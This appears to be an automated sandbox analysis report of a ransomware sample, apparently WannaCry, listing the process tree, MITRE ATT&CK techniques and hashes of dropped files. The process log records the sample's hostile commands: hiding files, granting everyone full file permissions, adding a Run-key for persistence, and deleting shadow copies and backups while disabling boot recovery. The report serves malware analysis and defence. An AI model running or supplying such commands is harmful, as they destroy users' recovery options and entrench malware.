  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=8252 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=8232 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=8376 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7840 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=8804 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=8800 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=8732 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:2480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=8740 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=9364 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=9648 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9080 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:6432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9972 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:6500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=10152 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=9796 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=10336 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6064 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=6100 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=10692 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5808 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:7040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=11016 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:7152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=5688 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10052 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=5396 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:1812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=4524 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=9428 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=5732 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=9396 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=10428 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=6288 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=6620 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=11252 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:1064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=10480 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:3776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=10748 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=10824 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=8936 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=8964 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:7072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=9180 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10656 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11056 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:1896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5752 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:2612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8992 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5076 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:6216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9076 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:5060
- C:\Users\Admin\Downloads\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
  "C:\Users\Admin\Downloads\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
  2⤵
  - Modifies extensions of user files
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  PID:5460
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - Views/modifies file attributes
    PID:7036
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:7116
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 6721680552846.bat
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    PID:4936
  - - C:\Users\Admin\Downloads\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5248
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:2792
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        
        PID:1424
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5936
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:5336
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:5528
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:6204
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "urfnhjtdlojhzxx574" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    PID:6432
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "urfnhjtdlojhzxx574" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      Modifies registry key
      PID:6072
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Suspicious use of SetWindowsHookEx
    PID:6188

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3548

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
585B

MD5
02c79c896e29796decf4a977f1930314

SHA1
57faebec8a5a53f899673e9ce745b68fb65647fd

SHA256
113df313271bb0bd1a61b744a50abb1184b0f380c4b598d4095ee9e384fd5468

SHA512
d64252c738bbf1adfecd4b29d8c5c2a6aead33d8241131be0e476a4daa5159c33142d9ac7f4b6754dcb80c66676cab64d2fce2424da4e4bccb2be56fd75a8cee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000026

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000056

Filesize
48KB

MD5
1e7768364a8db1e88535d1ca1ee9cd6b

SHA1
90d26fec8305c95cc5f6fa4b2398456d88627570

SHA256
eb24872de47889683879df871844b6468d59bb8126f106189b44bbe305853a0a

SHA512
a47fa27c6b7fe18bb7e82ce09f30d3cebc32a8cd63da4ca822ceeb1ac90569bf64e66632367673c1da9e3983c330f26a6edd7696e5e6e1814cfedef017d0fa19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
25b454f8e9f3a587aa1602e133da6dde

SHA1
1dc7a249e410c6b906f7acec7b1eb3f5b9080684

SHA256
373262bc2943bd69871254b52d7f2c1abdf37045decf1bb433019c6e1d140bfe

SHA512
95337f5e45f69e8db8821ef5ba09bbcd30648aa4e033a24f4ed1909c2efb7234b6bbdaa2f01f63a3f8353fd4ce0aee743072975d052e745d7cd29d2dbb766a6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
24KB

MD5
3f3740916e2f1cc50949684a5bc84ffc

SHA1
169f35cdb5d4b0add4e69ddf8ecaf784c0863340

SHA256
7dabcc71172867088ba273ff6c57f97e4ce726c17d4bd6f7ad1961d732c7078f

SHA512
4a3af08dc6455c8a52f1ed3c294bf7491d25f8987ca04b62556a46baf33b9456edbc95535f51e012aece589636973f10489f6670eea6439e0a713736b154acc9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
1da089c852c3a1e9f487568a0a907e88

SHA1
94d6fb93aa60f7401c34c65500c32e4b658fe840

SHA256
4d200eb366bef13830c45f45853fe8f8a5ce270bdf0c0b24d24a27f64d460ad3

SHA512
899975d6ceac4688d4d76222f1b94b97a00a62cb9c15655e1aa34cac548841dfcb839053a388681eeca65c1f7ebef602036a9b10596ba8c7524acda9aab98f0b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
6KB

MD5
c806bef1a022b3000ca2209314a6b254

SHA1
4a8189830eb82d167015a1046d5b317539834ad8

SHA256
4c4d4e55c79f34b1d194c06686936156c4ae92649c1176faad9175a4d084311d

SHA512
4042e800946190a9bb1efaa2b96cf0bea419e7d46660fb514108a9804be523da1f57df4d844536c0459eaf2892391a7f604570c854f419d7bfa9b7305845bc3c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
8KB

MD5
73a28523745e99af4a0ed2d891050920

SHA1
9302eb4b993c55b7efcf426d12d4ff79837a5440

SHA256
cb73c712f4d24d122d6910ace2c20b85efba1d7f223a7168828af36a6fdcf065

SHA512
51c63ae8f3c2cc6328e0aa4cd7224a0f79a1ba9d47e4f645ff8c9446bd3ab863ae636f7d659e54d514c790ed8e29b732ec975ce436a62f6834dc7554b6178bf6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
9KB

MD5
8fecc94db5be51bfbdcfe9f3ddc458c0

SHA1
734956e5d53f30837869a7c10b0832a9ea2b2df2

SHA256
57f7567c605e86ab1b47286a49b6bd7645e866b5058331ffe0906c0723ce0d26

SHA512
1839e57a6a406373264bcab794abb0fe39f6fcd0b2673cdb346802d356bdf2cb9ba05a28b057431c87033cf1988101b949063cc7c065efbc51948bc362ece6e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
54e2cd7fee1c8610e0eb554ed61aa13e

SHA1
e43c42792f038d8f084f3b03c1d99fa6a612392a

SHA256
2e1caf0a1bcc6d1a9a23be2392bee4da2066af25f3cb1f246decc56934565b1c

SHA512
fb3fe277af1d02935d46227e2479faad68ea5e9f91d6acc27f26d0ee3df5741d835bdc45a884431760d8222628c5565afec6964ef297280ea35308483146c53f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
f2bd55123688046ec2f92eaa218749b6

SHA1
59e2ed52a97178e9aff7b363c9158c6c36a02b8c

SHA256
7d82f8055bcbd3ef092f1c0572d4cd311489c85801caada61a2c546dbad219b5

SHA512
ca4ffda27f095c9399dc9d4ba561711d6b40b2584a1aa680b026a95e7ef9f8d7fa8ba32cc46d85d170850de658311755162a8ba9ae2a3b5414d9b89c2688e00c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
0e91e3f14c00711e3fdfe222453c6a94

SHA1
98e5837471af453cee3591d4ae4ed1d11bb00007

SHA256
008e0df2c99de16c05c790bae073f2a92599a3bb7150989915c1217f06dabd6d

SHA512
f89955a153f9372c3405658750e1b3d449f9f4f5d9701eb220e51127ea591936c92d1b68e8a5bf21c51bd876e5c3c8909ed7d7d470900d0c7ac37741379f0bb5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
c33e1a77f53339430ae35021fa2fd14c

SHA1
7c093f5544caadd13e66bd3fbcbc3703a9629b38

SHA256
588b6ce39c73c9eebb679d20d37abdd220b6c67c14f09758614b934b1eac8d39

SHA512
4cd032969c69344bd9996c47c8e24970e8c3bf4d5489bdf1d732869b5a2badabb4f2d39dab0a1626357a504d581508fa4323efa8e8f024bf160e8830cd4c5c4b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
174KB

MD5
1478804cfe3163453e2d50d98ad90313

SHA1
ddbc592b37b0a1c49795f179ad229b1126ee6bf1

SHA256
f149a25d8eb6202fbb9ac724abc961a926e3d7843214e87b55a1b7569b9b71a5

SHA512
af1bf39f65e3b13f0cbd6d1417ca42e1a5d9a667576557d18132a6d78fee02738873a42d0dce23468b469980a2ec490032ef50e5b0b8db54c51e1e474517f3b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
174KB

MD5
57a4878ce327a8844ec13079df9dcf9b

SHA1
9c9a3a8b0414cf84db7e85c91020d0c3c304b550

SHA256
8954edccd183c0f59de142381b7efac57609486fc657386621c6d3aacdbab660

SHA512
93dd2046775710ebeae5d2ea9070e64ff4c81fa9c6e8d0a52ba23c8e9b7d4fdf8c3a8413c1c1b12c91c560308bc2a8d1679eee4515c370ca27d36a4b619ae2ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
174KB

MD5
bf9a8005eb0fad2315986978a18c4365

SHA1
959844e18c20ce9fc8d160f9a97404e3e97fec99

SHA256
